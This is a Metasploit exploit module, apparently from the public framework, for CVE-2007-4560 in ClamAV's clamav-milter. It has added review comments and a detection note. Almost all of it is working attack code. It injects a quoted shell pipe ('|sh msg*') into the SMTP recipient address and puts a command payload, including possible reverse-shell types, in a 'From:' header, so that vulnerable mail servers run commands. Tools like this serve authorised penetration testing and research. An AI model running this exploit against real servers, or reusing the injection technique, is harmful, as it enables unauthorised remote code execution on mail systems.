##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Smtp

  # Registers module metadata (name, description, references, payload
  # constraints, target, notes) and the single MAILTO option.
  #
  # @param info [Hash] module info merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'ClamAV Milter Blackhole-Mode Remote Code Execution',
        'Description' => %q{
          This module exploits a flaw in the Clam AntiVirus suite 'clamav-milter'
          (Sendmail mail filter). Versions prior to v0.92.2 are vulnerable.
          When implemented with black hole mode enabled, it is possible to execute
          commands remotely due to an insecure popen call.
        },
        'Author' => [ 'aushack' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2007-4560' ],
          [ 'OSVDB', '36909' ],
          [ 'BID', '25439' ],
          [ 'EDB', '4761' ]
        ],
        'Privileged' => true,
        # Only command payloads are usable here; the 'From:' header carries the
        # command text verbatim, so NOPs are disabled and space is capped at 1024.
        'Payload' => {
          'DisableNops' => true,
          'Space' => 1024,
          'Compat' =>
          {
            'PayloadType' => 'cmd cmd_bash',
            'RequiredCmd' => 'generic perl ruby bash-tcp telnet',
          }
        },
        'Platform' => 'unix',
        'Arch' => ARCH_CMD,
        'Targets' => [
          [ 'Automatic', {}],
        ],
        'DisclosureDate' => '2007-08-24',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    # MAILTO is expected to be a full 'user@host' address; exploit splits it on '@'
    # without validating that both parts are present.
    register_options(
      [
        OptString.new('MAILTO', [ true, 'TO address of the e-mail', 'nobody@localhost']),
      ]
    )
  end

  # Sends one message through the SMTP mixin: the command payload is placed in
  # the 'From:' header, and datastore['MAILTO'] is temporarily rewritten so the
  # recipient local part carries a quoted '|sh msg*' suffix (per the comments
  # below, the mixin uses MAILTO as the RCPT TO address).
  #
  # NOTE(review): MAILTO is restored only after both sock.put calls complete,
  # not in an `ensure`; if connect_login or sock.put raises, the datastore is
  # left holding the rewritten address for the rest of the session.
  # NOTE(review): `oldaddr.split('@')` yields a nil host part when MAILTO has
  # no '@', so the rewritten address ends in '@' with an empty host.
  #
  # Detection note: the wire-level indicator this module produces is a
  # recipient local part of the form user+"|sh msg*"@host, i.e. a quoted
  # shell pipe inside an SMTP address, followed by a 'From:' header that
  # begins with ';'.
  def exploit
    # ClamAV writes randomized msg.###### temporary files in a randomized
    # /tmp/clamav-#######################/ directory. This directory is
    # the clamav-milter process working directory.
    #
    # We *can* execute arbitrary code directly from 'sploit', however the
    # SMTP RFC rejects all payloads with the exception of generic CMD
    # payloads due to the IO redirects. I discovered that the 'From:'
    # header is written to this temporary file prior to the vulnerable
    # call, so we call the file itself and payload.encoded is executed.

    sploit = "sh msg*" # Execute the clamav-milter temporary file.

    # Create the malicious RCPT TO before connecting,
    # to make good use of the Msf::Exploit::Smtp support.

    oldaddr = datastore['MAILTO']
    newaddr = oldaddr.split('@') # [local_part, host]; host is nil if no '@'

    datastore['MAILTO'] = "<#{newaddr[0]}+\"|#{sploit}\"@#{newaddr[1]}>"

    connect_login

    sock.put("From: ;#{payload.encoded}\r\n") # We are able to stick our payload in this header
    sock.put(".\r\n") # lone '.' line terminates the message body

    # Clean up RCPT TO afterwards
    # (not reached if an earlier call raised — see NOTE(review) above)

    datastore['MAILTO'] = oldaddr

    handler
    disconnect
  end
end